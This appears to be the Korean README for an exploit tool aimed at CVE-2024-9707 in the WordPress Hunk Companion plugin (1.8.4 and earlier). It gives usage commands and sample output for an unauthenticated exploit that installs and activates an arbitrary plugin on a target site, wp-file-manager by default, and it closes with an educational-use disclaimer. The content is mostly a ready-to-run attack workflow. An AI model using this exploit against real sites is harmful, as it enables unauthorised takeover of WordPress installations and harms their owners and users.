
Hunk Companion 플러그인 (WordPress용): 무단 플러그인 설치/활성화에 취약 (버전 1.8.4 이하)
| 기능 | 설명 |
|---|
| 플러그인 버전 감지 | 자동으로 플러그인 버전 확인. |
| 취약점 확인 | 감지된 버전이 취약한지 확인 (<= 1.8.4). |
| 플러그인 설치 | 취약점을 악용하여 지정된 플러그인을 설치 및 활성화. |
requests, argparse.pip install requests
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site.
-p PLUGIN, --plugin PLUGIN
Plugin name (default: wp-file-manager).
2- 스크립트 실행
python CVE-2024-9707.py -u <TARGET_URL> [-p <PLUGIN_NAME>]
python CVE-2024-9707.py -u https://example.com -p wp-file-manager
Detected version: 1.8.4
The site is vulnerable. Proceeding with exploitation.
Plugin installed and activated successfully.
Response Status: 200
Response Body: "http:\/\/192.168.100.74\/wordpress"
이 스크립트는 교육 목적으로만 제공됩니다. 책임감 있게 사용하고, 자신이 소유하거나 테스트할 명시적 권한이 있는 시스템에서만 사용하십시오. 작성자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 작성자: Khaled_alenazi | Nxploited